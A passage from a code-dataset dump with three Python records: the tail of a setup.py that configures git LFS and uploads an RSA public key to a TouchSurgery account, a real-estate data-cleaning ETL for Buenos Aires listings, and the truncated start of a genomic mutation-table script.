check_and_create_directory(path):\n try:\n if not os.path.exists(path):\n os.mkdir(path)\n except Exception:\n print(\"Could not find or create the directory\")\n raise ValidationError\n\n\ndef check_and_create_file(path):\n try:\n if not os.path.exists(path):\n subprocess.check_output(['touch', path])\n except Exception as e:\n print(\"Could not find or create the file\")\n print(e)\n raise ValidationError\n\n\ndef configure_git_lfs():\n \"\"\"Set relevant lfs settings\n \"\"\"\n call_command_and_print_exception(['git', 'config', '--global', 'lfs.url',\n 'https://live.touchsurgery.com/api/v3/lfs'], \"lfs config failure\")\n call_command_and_print_exception(['git', 'config', '--global', 'lfs.activitytimeout', '60'], \"lfs config failure\")\n\n\ndef create_rsa_return_pub_key():\n private_key = settings.RSA_PRIVATE_KEY_PATH\n public_key = settings.RSA_PUBLIC_KEY_PATH\n\n key = RSA.generate(2048)\n if os.path.exists(private_key):\n os.chmod(private_key, 0o0600)\n\n with open(private_key, 'wb') as rsa_pri:\n os.chmod(private_key, 0o0600)\n rsa_pri.write(key.exportKey('PEM'))\n\n pubkey = key.publickey()\n with open(public_key, 'wb') as rsa_pub:\n pub_key = pubkey.exportKey('OpenSSH')\n rsa_pub.write(pubkey.exportKey('OpenSSH'))\n\n return pub_key.split()[1]\n\n\ndef login(email, password, pub_key):\n \"\"\"Verify TouchSurgery user here with rsa key and TouchSurgery login\n \"\"\"\n login_instance = TouchSurgery()\n if not login_instance.login(email, password):\n return False\n if not login_instance.upload_key(pub_key):\n print('Your rsa key is invalid, please try running setup again or contact pipeline.')\n raise ValidationError\n return True\n", "sub_path": "pypi_install_script/tspublisher-0.0.1.dev2164-py2.py3-none-any/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 7932, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "publisher.utils.get_platform", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 30, "usage_type": "call"}, {"api_name": "publisher.settings.SSH_DIRECTORY_PATH", "line_number": 33, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 33, "usage_type": "name"}, {"api_name": "sys.stdout.flush", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 34, "usage_type": "attribute"}, {"api_name": "publisher.settings.SSH_CONFIG_PATH", "line_number": 43, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 43, "usage_type": "name"}, {"api_name": "publisher.settings.GIT_DIRECTORY", "line_number": 53, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "publisher.settings.PROCEDURE_REPOSITORY", "line_number": 60, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 60, "usage_type": "name"}, {"api_name": "publisher.settings.PROCEDURE_CHECKOUT_DIRECTORY", "line_number": 60, "usage_type": "attribute"}, {"api_name": "publisher.settings.CHANNELS_REPOSITORY", "line_number": 61, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 61, "usage_type": "name"}, {"api_name": "publisher.settings.CHANNELS_CHECKOUT_DIRECTORY", "line_number": 61, "usage_type": "attribute"}, {"api_name": "publisher.settings.TRANSLATIONS_REPOSITORY", "line_number": 62, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 62, "usage_type": "name"}, {"api_name": "publisher.settings.TRANSLATIONS_CHECKOUT_DIRECTORY", "line_number": 62, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 76, "usage_type": "attribute"}, {"api_name": "publisher.utils.get_input", "line_number": 77, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 79, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 86, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 86, "usage_type": "attribute"}, {"api_name": "publisher.utils.get_input", "line_number": 87, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 89, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 91, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 97, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 97, "usage_type": "attribute"}, {"api_name": "getpass.getpass", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "publisher.settings.RSA_PUBLIC_KEY_PATH", "line_number": 105, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 105, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "publisher.settings.SSH_CONFIG_PATH", "line_number": 111, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 111, "usage_type": "name"}, {"api_name": "publisher.settings.STUDIO_GIT_PATH", "line_number": 118, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 118, "usage_type": "name"}, {"api_name": "publisher.settings.STUDIO_GIT_PATH", "line_number": 126, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 126, "usage_type": "name"}, {"api_name": "publisher.settings.RSA_PRIVATE_KEY_PATH", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "publisher.settings.SSH_CONFIG_PATH", "line_number": 130, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 130, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "publisher.settings.SSH_CONFIG_PATH", "line_number": 138, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 138, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "publisher.settings.SSH_CONFIG_PATH", "line_number": 143, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 143, "usage_type": "name"}, {"api_name": "publisher.utils.get_platform", "line_number": 154, "usage_type": "call"}, {"api_name": "publisher.utils.get_command_output", "line_number": 155, "usage_type": "call"}, {"api_name": "publisher.utils.get_platform", "line_number": 163, "usage_type": "call"}, {"api_name": "publisher.utils.get_command_output", "line_number": 164, "usage_type": "call"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 166, "usage_type": "call"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 173, "usage_type": "call"}, {"api_name": "publisher.utils.WorkingDirectory", "line_number": 179, "usage_type": "call"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path", "line_number": 185, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 186, "usage_type": "call"}, {"api_name": "publisher.exceptions.ValidationError", "line_number": 189, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 195, "usage_type": "call"}, {"api_name": "publisher.exceptions.ValidationError", "line_number": 199, "usage_type": "name"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 205, "usage_type": "call"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 207, "usage_type": "call"}, {"api_name": "publisher.settings.RSA_PRIVATE_KEY_PATH", "line_number": 211, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 211, "usage_type": "name"}, {"api_name": "publisher.settings.RSA_PUBLIC_KEY_PATH", "line_number": 212, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 212, "usage_type": "name"}, {"api_name": "Crypto.PublicKey.RSA.generate", "line_number": 214, "usage_type": "call"}, {"api_name": "Crypto.PublicKey.RSA", "line_number": 214, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.chmod", "line_number": 216, "usage_type": "call"}, {"api_name": "os.chmod", "line_number": 219, "usage_type": "call"}, {"api_name": "publisher.touchsurgery.TouchSurgery", "line_number": 233, "usage_type": "call"}, {"api_name": "publisher.exceptions.ValidationError", "line_number": 238, "usage_type": "name"}]}
+{"seq_id": "473315107", "text": "import pandas as pd\nimport numpy as np\nimport math\nimport re\nimport matplotlib.pyplot as plt\nfrom statistics import mode\nfrom matplotlib import cm as cm\nfrom shapely import wkt\nfrom shapely.geometry import Point, Polygon, MultiPolygon, LinearRing\nimport geopandas as gpd\n\n#from pydrive.auth import GoogleAuth\n#from pydrive.drive import GoogleDrive\n#from google.colab import auth\n#from oauth2client.client import GoogleCredentials\n#\n#from sklearn import svm\n\npd.set_option('display.expand_frame_repr', False)\npd.options.display.float_format = '{:.2f}'.format\n\nclass tp1_ETL:\n \n def calcularDistancia(self,lat1, lon1, lat2, lon2):\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a =math.sin(dlat / 2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2)**2\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n return self.R * c\n \n def distanciaMinimaParque(self, lat, lon):\n listaDistancias = []\n if ((lat is not None) and (lon is not None)):\n flat=float(lat)\n flon=float(lon) \n for index, row in self.parques.iterrows():\n d = self.parques.at[index,\"Arcos\"].project(Point(flon,flat))\n p = self.parques.at[index,\"Arcos\"].interpolate(d)\n pmc = list(p.coords)[0]\n listaDistancias.append(self.calcularDistancia(math.radians(flat), math.radians(flon), math.radians(float(pmc[1])), math.radians(float(pmc[0]))))\n \n if (len(listaDistancias)>0):\n return min(listaDistancias)\n else:\n return math.nan\n\n def __init__(self):\n self.R = 6373.0\n #Authenticate and create the PyDrive client.\n #auth.authenticate_user()\n #gauth = GoogleAuth()\n #gauth.credentials = GoogleCredentials.get_application_default()\n #drive = GoogleDrive(gauth)\n #linkDS = 'https://drive.google.com/open?id=1GXhb9LJJshv_gFdiMS6PujIG8SlhaZqv' # The shareable link\n #fluff, id = linkDS.split('=')\n #downloaded = drive.CreateFile({'id':id})\n #downloaded.GetContentFile('properatti.csv')\n #\n ##https://drive.google.com/open?id=1HXMeE6Endm3g4c3JeiYIggdNcoQk6IqR -> DataSet con Lookup table Precio X m2\n #link_lookupPxM2=\"https://drive.google.com/open?id=1HXMeE6Endm3g4c3JeiYIggdNcoQk6IqR\"\n #fluff, id = link_lookupPxM2.split('=')\n #downloaded = drive.CreateFile({'id':id})\n #downloaded.GetContentFile('precioxm2_pais.csv')\n\n self.df=pd.read_csv(\"C:\\\\Users\\\\Public\\\\properati.csv\", encoding = 'utf8')\n self.df_m2=pd.read_csv(\"datasets\\\\precioxm2_pais.csv\", encoding = 'utf8')\n self.subte=pd.read_csv(\"datasets\\\\estaciones-de-subte.csv\", encoding = 'utf8')\n self.subtes=self.subte[['lon', 'lat']]\n self.hospitales=pd.read_csv(\"datasets\\\\hospitales.csv\", encoding = 'utf8')\n self.escuelas=pd.read_csv(\"datasets\\\\escuelas.csv\", encoding = 'utf8')\n self.parques=pd.read_csv(\"datasets\\\\arcos.csv\", encoding = 'utf8')\n self.barrios=pd.read_csv('datasets\\\\barrios.csv', encoding = 'utf8')\n self.barrios['WKT'] = self.barrios['WKT'].apply(wkt.loads)\n self.barrios=gpd.GeoDataFrame(geometry=self.barrios.WKT)\n self.parques['Arcos'] = self.parques['Arcos'].apply(wkt.loads)\n \n self.subtes_gdf = gpd.GeoDataFrame(self.subtes, geometry=[Point(x, y) for x, y in zip(self.subtes.lon, self.subtes.lat)], crs={'init': 'epsg:4326'})\n self.subtes_gdf.to_crs(epsg=22196,inplace=True)\n self.hospitales_gdf = gpd.GeoDataFrame(self.hospitales, geometry=[Point(x, y) for x, y in zip(self.hospitales.lon, self.hospitales.lat)], crs={'init': 'epsg:4326'})\n self.hospitales_gdf.to_crs(epsg=22196,inplace=True)\n self.escuelas_gdf = gpd.GeoDataFrame(self.escuelas, geometry=[Point(x, y) for x, y in zip(self.escuelas.lon, self.escuelas.lat)], crs={'init': 'epsg:4326'})\n self.escuelas_gdf.to_crs(epsg=22196,inplace=True)\n \n print(\"DataSet registros:\", len(self.df))\n print(\"DataSet Lookup Precio x m2:\", len(self.df_m2))\n \n \n\n valor_Dolar=17.8305\n \n #DROPEAMOS VARIABLES NO INTERESANTES\n cols=['price', 'currency', 'country_name', 'price_aprox_local_currency','operation','properati_url','place_with_parent_names','image_thumbnail','rooms','geonames_id']\n #cols=['price', 'currency', 'price_aprox_local_currency']\n self.df.drop(cols, axis=1, inplace=True)\n\n #FIJAR SCOPE EN CABA - Caballito\n self.df = self.df[self.df['state_name'] == 'Capital Federal']\n\n self.df['lon'].fillna(0, inplace=True)\n self.df['lat'].fillna(0, inplace=True)\n self.df = gpd.GeoDataFrame(self.df, geometry=[Point(x, y) for x, y in zip(self.df.lon, self.df.lat)])\n self.df = gpd.sjoin(self.df, self.barrios, how='inner')\n self.df.loc[:, 'place_name'] = 'Caballito'\n \n self.df.drop('state_name', axis=1, inplace=True)\n print(\"cantidad de registros:\", len(self.df))\n \n #dummificar las variables place_name y property_type\n #dummies_place=pd.get_dummies(self.df['place_name'],prefix='dummy_place_',drop_first=True)\n dummies_property=pd.get_dummies(self.df['property_type'],prefix='dummy_property_type_',drop_first=True)\n self.df=pd.concat([self.df,dummies_property],axis=1)\n #self.df=pd.concat([self.df,dummies_place],axis=1)\n\t\t\n\n #IMPUTAMOS EXPENSAS POR EL PROMEDIO\n promedio_exp=round(self.df['expenses'].mean(),2)\n print(\"promedio expensas:\", promedio_exp)\n self.df['expenses']=self.df['expenses'].fillna(promedio_exp)\n \n #ARREGLAR LATITUD Y LONGITUD A PARTIR DE LA COLUMNA LAT-LON\n latlongdf=self.df['lat-lon'].str.split(\",\",expand=True)\n self.df['lat']=latlongdf.loc[:,0]\n self.df['lon']=latlongdf.loc[:,1]\n self.df.drop('lat-lon',axis=1,inplace=True)\n\n #CORRECCION DE M2 TOTALES\n df1 = self.df[self.df['surface_total_in_m2'].isnull()]\n aux = df1['title'].str.extract(r'( a )?(\\.)?(x )?(\\d+)\\s?(m2|mt|m²)[^c](?!\\w?cub)', re.IGNORECASE)\n aux.dropna(how='all', inplace=True)\n aux=aux[(aux[0].isnull()) & (aux[1].isnull()) & (aux[2].isnull())]\n aux=aux.drop([0, 1, 2, 4], axis=1)\n aux.columns=['surface_total_in_m2']\n aux['surface_total_in_m2']=aux['surface_total_in_m2'].astype('float64')\n self.df.loc[self.df['surface_total_in_m2'].isnull(),'surface_total_in_m2'] = aux['surface_total_in_m2']\n\n aux = df1['description'].str.extract(r'( a )?(\\.)?(x )?(\\d+)\\s?(m2|mt|m²)[^c](?!\\w?cub)', re.IGNORECASE)\n aux.dropna(how='all', inplace=True)\n aux=aux[(aux[0].isnull()) & (aux[1].isnull()) & (aux[2].isnull())]\n aux=aux.drop([0, 1, 2, 4], axis=1)\n aux.columns=['surface_total_in_m2']\n aux['surface_total_in_m2']=aux['surface_total_in_m2'].astype('float64')\n self.df.loc[self.df['surface_total_in_m2'].isnull(),'surface_total_in_m2'] = aux['surface_total_in_m2']\n\n #CORRECCION DE M2 CUBIERTOS\n df1 = self.df[self.df['surface_covered_in_m2'].isnull()]\n aux = df1['title'].str.extract(r'(\\d+)\\s?(m2|mt|m²)(c[^o]|\\s?cub)', re.IGNORECASE)\n aux.dropna(how='all', inplace=True)\n aux=aux.drop([1, 2], axis=1)\n aux.columns=['surface_covered_in_m2']\n aux['surface_covered_in_m2']=aux['surface_covered_in_m2'].astype('float64')\n self.df.loc[self.df['surface_covered_in_m2'].isnull(),'surface_covered_in_m2'] = aux['surface_covered_in_m2']\n\n aux = df1['description'].str.extract(r'(\\d+)\\s?(m2|mt|m²)(c[^o]|\\s?cub)', re.IGNORECASE)\n aux.dropna(how='all', inplace=True)\n aux=aux.drop([1, 2], axis=1)\n aux.columns=['surface_covered_in_m2']\n aux['surface_covered_in_m2']=aux['surface_covered_in_m2'].astype('float64')\n self.df.loc[self.df['surface_covered_in_m2'].isnull(),'surface_covered_in_m2'] = aux['surface_covered_in_m2']\n\n #CORRECCION DE PRECIOS\n df1 = self.df[self.df['price_aprox_usd'].isnull()]\n aux = df1['title'].str.extract(r'(U?u?\\$[SDsd]?)\\s?(\\d+)\\.?(\\d*)\\.?(\\d*)')\n aux.dropna(inplace=True)\n aux[0]=aux[0].replace(to_replace='^\\$$', value='ARS', regex=True)\n aux[0]=aux[0].replace(to_replace='^[^A].*$', value='USD', regex=True)\n aux['currency']=aux[0]\n aux['price']=aux[1]+aux[2]+aux[3]\n aux['price']=aux['price'].astype('float64')\n aux=aux[['currency','price']]\n aux.loc[aux['currency'] == 'ARS', 'price'] = aux.loc[:, 'price']/valor_Dolar\n self.df.loc[self.df['price_aprox_usd'].isnull(),'price_aprox_usd'] = aux.loc[:, 'price']\n\n aux = df1['description'].str.extract(r'(U?u?\\$[SDsd]?)\\s?(\\d+)\\.?(\\d*)\\.?(\\d*)')\n aux=aux.dropna()\n aux[0]=aux[0].replace(to_replace='^\\$$', value='ARS', regex=True)\n aux[0]=aux[0].replace(to_replace='^[^A].*$', value='USD', regex=True)\n aux['currency']=aux[0]\n aux['price']=aux[1]+aux[2]+aux[3]\n aux['price']=aux['price'].astype('float64')\n aux=aux[['currency','price']]\n aux.loc[aux['currency'] == 'ARS', 'price'] = aux.loc[:, 'price']/valor_Dolar\n self.df.loc[self.df['price_aprox_usd'].isnull(),'price_aprox_usd'] = aux.loc[:, 'price']\n\n #COMPLETAR REGISTROS DESPUES DE LLENAR CON REGEX\n self.df.dropna(subset=['surface_total_in_m2', 'surface_covered_in_m2'], how='all', inplace=True)\n self.df.loc[(self.df['surface_total_in_m2'].isnull()) & (self.df['surface_covered_in_m2'].notnull()), 'surface_total_in_m2'] = self.df.loc[:, 'surface_covered_in_m2']\n \n #ARREGLAR DATOS CORREGIBLES\n #Arreglar precio x m2 en dólares\n self.df['price_aprox_usd']=np.round(self.df['price_aprox_usd'],0).fillna(0).astype(np.int64)\n self.df['surface_total_in_m2']=np.round(self.df['surface_total_in_m2'],0).astype(np.int64)\n\n \n \n auxval=0\n qryfiltro=\"\"\n rowcounter=0\t\n\t\t\n self.df.reset_index(drop=True, inplace=True)\n \n for index, row in self.df.iterrows():\n rowcounter+=1\n if (math.fmod(rowcounter,100)==0):print(\"Processing row:\", rowcounter)\n \n aux = pd.Series(Point(float(self.df.at[index,\"lon\"]), float(self.df.at[index,\"lat\"])))\n aux = gpd.GeoDataFrame(aux, geometry=aux, crs={'init':'epsg:4326'})\n aux.to_crs(epsg=22196,inplace=True)\n aux = aux.loc[0,'geometry']\n \n self.df.at[index,\"distSubte\"] = min(self.subtes_gdf.distance(aux))\n self.df.at[index,\"distEscuela\"] = min(self.escuelas_gdf.distance(aux))\n self.df.at[index,\"distHospital\"] = min(self.hospitales_gdf.distance(aux))\n self.df.at[index,\"distParque\"] = self.distanciaMinimaParque(self.df.at[index,\"lat\"], self.df.at[index,\"lon\"])\n\n \n\n vcols=[\"acondicionado\",\"amenities\",\"alarma\",\"ascensor\",\"balcon\",\"baulera\",\"blindada\",\"calefaccion\",\n \"cancha\",\"cine\",\"cochera\",\"contrafrente\",\"crédito\",\"electrógeno\",\"estrenar\",\"fitness\",\"frente\",\"frio-calor\",\n \"guardacoche\",\"gimnasio\",\"jacuzzi\",\"hidromasaje\",\"hospital\",\n \"jardin\",\"lavarropas\",\"lavadero\",\"laundry\",\"luminoso\",\"living\",\"metrobus\",\"multisplit\",\"parque\",\n \"patio\",\"parrilla\",\"pentahome\",\"pileta\",\"premium\",\"piscina\",\"policlínico\",\"profesional\",\n \"quincho\",\"refrigeración\",\"residencial\",\"reciclado\",\"pozo\",\"sauna\",\n \"spa\",\"split\",\"solarium\",\"sum\",\"S.U.M\",\"subte\",\"suite\",\"seguridad\",\"terraza\",\"vigilancia\"]\n\n for x in vcols:\n self.df[\"dummy_\" + x]=self.df[\"description\"].str.contains(x).astype(int)\n \n \n #HACEMOS EL RECORTE\n cant_regs_total=len(self.df)\n cant_regs_train=math.trunc((cant_regs_total/100)*80)\n print(\"cant. regs. totales:\", cant_regs_total)\n print(\"cant. regs. train:\", cant_regs_train)\n df_test=self.df.iloc[cant_regs_train:cant_regs_total,:]\n df_test['precio_m2_usd']=df_test['price_usd_per_m2']\n print(\"df_test:\" ,len(df_test))\n \n self.df.loc[(self.df['price_usd_per_m2'].isnull()) & (self.df['price_aprox_usd'].notnull()) & (self.df['surface_total_in_m2'].notnull()), 'price_usd_per_m2'] = self.df.loc[:, 'price_aprox_usd']/self.df.loc[:, 'surface_total_in_m2']\n self.df.drop(['surface_covered_in_m2', 'price_per_m2'], axis=1, inplace=True)\n self.df['precio_m2_usd']=np.round(self.df['price_aprox_usd'] / self.df['surface_total_in_m2'],0)\n\n\n #LIMPIAR BASURA\n self.df=self.df[pd.to_numeric(self.df['dummy_property_type__store'], errors='coerce').notnull()]\n self.df=self.df[pd.to_numeric(self.df['dummy_property_type__apartment'], errors='coerce').notnull()]\n self.df=self.df[pd.to_numeric(self.df['dummy_property_type__house'], errors='coerce').notnull()]\n self.df=self.df[pd.to_numeric(self.df['lat'], errors='coerce').notnull()]\n self.df=self.df[pd.to_numeric(self.df['lon'], errors='coerce').notnull()]\n self.df=self.df[pd.to_numeric(self.df['distSubte'], errors='coerce').notnull()]\n\n #Guardamos el dataset antes del recorte\n self.df.to_csv(\"datasets\\\\properati_caballito.csv\",encoding='utf-8')\t\t\n \n \n #df_test[\"price_usd_per_m2\"]=0\n \n self.df=self.df.iloc[:cant_regs_train,:]\n \n for index, row in self.df.iterrows():\n if not (row.property_type == ''):\n \n if (self.df.at[index,\"price_usd_per_m2\"] == 0):\n qryfiltro=\"place_name=='\" + row.place_name + \"'\"\n qryfiltro+=\" and (m2_Desde<=\" + str(row.surface_total_in_m2)\n qryfiltro+=\" and m2_Hasta>=\" + str(row.surface_total_in_m2) + \")\"\n\n auxval=self.df_m2.query(qryfiltro).Valor_usd\n #print(\"auxval:\" , auxval)\n #print(\"len(auxval):\" , len(auxval))\n \n if (len(auxval)>=2):\n self.df.at[index,\"price_usd_per_m2\"]=auxval[1]\n \n\n #FILTRAR OUTLIERS\n qryFiltro=\"(price_aprox_usd >= 50000 and price_aprox_usd <= 500000)\"\n qryFiltro+=\" and (surface_total_in_m2 >= 35 and surface_total_in_m2 <= 500)\"\n #qryFiltro+=\" and (surface_total_in_m2 >= surface_covered_in_m2)\"\n qryFiltro+=\" and (precio_m2_usd <= 7000 and precio_m2_usd >= 2000)\"\n qryFiltro+=\" and (price_usd_per_m2 <= 7000 and price_usd_per_m2 >= 2000)\"\n \n self.df=self.df.query(qryFiltro)\n df_test=df_test.query(qryFiltro)\n \n \n self.df[\"rooms\"]=round(self.df['surface_total_in_m2'] / 10,0)\n df_test[\"rooms\"]=round(df_test['surface_total_in_m2'] / 10,0)\n \n\n df_test.to_csv(\"datasets\\\\properati_caballito_test.csv\",encoding=\"utf8\")\n self.df.to_csv(\"datasets\\\\properati_caballito_train.csv\",encoding='utf-8')\n print(\"campos de salida:\", self.df.columns)\n #uploaded = drive.CreateFile({'Properati_fixed': 'Properati_fixed.csv'})\n #uploaded.SetContentFile(\"Properati_fixed.csv\")\n #uploaded.Upload()\n\n print(\"All done!\")\n\n\nx=tp1_ETL()\n", "sub_path": "TP1y2/TP_ETL.py", "file_name": "TP_ETL.py", "file_ext": "py", "file_size_in_byte": 15236, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.set_option", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.options", "line_number": 20, "usage_type": "attribute"}, {"api_name": "math.sin", "line_number": 27, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 27, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 28, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 28, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 37, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 40, "usage_type": "call"}, {"api_name": "math.nan", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 66, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 67, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "shapely.wkt.loads", "line_number": 73, "usage_type": "attribute"}, {"api_name": "shapely.wkt", "line_number": 73, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 74, "usage_type": "call"}, {"api_name": "shapely.wkt.loads", "line_number": 75, "usage_type": "attribute"}, {"api_name": "shapely.wkt", "line_number": 75, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 77, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 77, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 79, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 79, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 81, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 81, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 101, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 101, "usage_type": "call"}, {"api_name": "geopandas.sjoin", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 110, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 111, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "re.IGNORECASE", "line_number": 136, "usage_type": "attribute"}, {"api_name": "re.IGNORECASE", "line_number": 146, "usage_type": "attribute"}, {"api_name": "re.IGNORECASE", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 190, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 191, "usage_type": "attribute"}, {"api_name": "math.fmod", "line_number": 203, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 205, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 205, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 206, "usage_type": "call"}, {"api_name": "math.trunc", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 240, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 244, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 245, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 246, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 247, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 248, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 249, "usage_type": "call"}]}
+{"seq_id": "434905684", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 18 11:32:38 2020\r\n\r\n@author: amurtha\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport scipy.stats as stats\r\nimport numpy as np\r\n\r\npd.set_option(\"display.max_columns\", None)\r\n\r\ndef get_adj_maf(maf, depth):\r\n alt = maf*depth\r\n for p in np.arange(0,1,0.005):\r\n dist = stats.binom(depth, p)\r\n if dist.cdf(alt) < 0.95:\r\n maf = p; break;\r\n return maf;\r\n\r\n# =============================================================================\r\n# Create mutation table\r\n# =============================================================================\r\n\r\nsample_id = ['17-095-3rd-cfDNA'] * 5\r\nchrom = ['chr5', 'chr8', 'chr11', 'chr17', 'chr17']\r\ngene = ['TERT', 'FGFR1', 'ATM', 'TP53', 'TP53']\r\naf = [0.032, 0.074, 0.053, 0.07, 0.072] #allele frequency is equal to mutant reads / total reads\r\nread_depth = [312, 1519, 1351, 1262, 1283]\r\neffect = ['Upstream',\r\n 'Missense',\r\n 'Missense',\r\n 'Synonymous',\r\n 'Missense']\r\n\r\nmuts = pd.DataFrame({'Sample_ID':sample_id,'CHROM':chrom,'GENE':gene,'EFFECT':effect,'Allele_frequency':af, 'Read_depth':read_depth})\r\n\r\ndel sample_id, chrom,gene,af,read_depth,effect\r\n\r\n# =============================================================================\r\n# Create copy number table\r\n# =============================================================================\r\n\r\nsample_id = ['17-095-3rd-cfDNA'] * 4\r\ngene = ['TERT', 'FGFR1', 'ATM', 'TP53']\r\ncopy_num = [0, 0, 0, 0]\r\nlr = [0.01, 0.04, -0.06, -0.03]\r\n\r\ncn = 